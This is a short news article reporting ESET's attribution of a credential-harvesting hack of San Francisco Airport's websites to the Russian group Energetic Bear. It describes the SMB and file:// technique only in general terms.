Back this week, we had revealed the fact that San Francisco Airport’s website was recently hacked and the airport authorities revealed regarding the hack. They also said that many account details have been compromised but there is no further case of anyone being compromised due to the hack. At that time, the airport did not tell anyone how the hack took place but did inform that those whose accounts have been found in breach are contacted and being told to stay safe. Now, it is time to reveal who the real hackers were behind this airport security breach.
A new report has been found out this morning which says that Russian state hacking group also known as the Energetic Bear was behind hacking two of airport’s websites. It is also mentioned in the report that these hackers are believed to be working for the Russian government. ESET, the team of researchers who found out the source of attacks, revealed that “The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,”
As for more details about this attack, ZDNet says that “NTLM hashes can be cracked to obtain a cleartext version of a user’s Windows password. If the hackers had access to the airport’s internal network, they could have used credentials obtained from airport employees to spread laterally through the airport’s internal network to conduct reconnaissance, data theft, or sabotage”
ESET says that “This technique has been used for years by Energetic Bear/DragonFly,” and adds that “We don’t have any information about the compromise of another airport website,”. “According to ESET telemetry, the other websites that were recently compromised are mainly media websites in Eastern Europe.” which means more widespread hacks were done by the Russian group but they have not been revealed yet.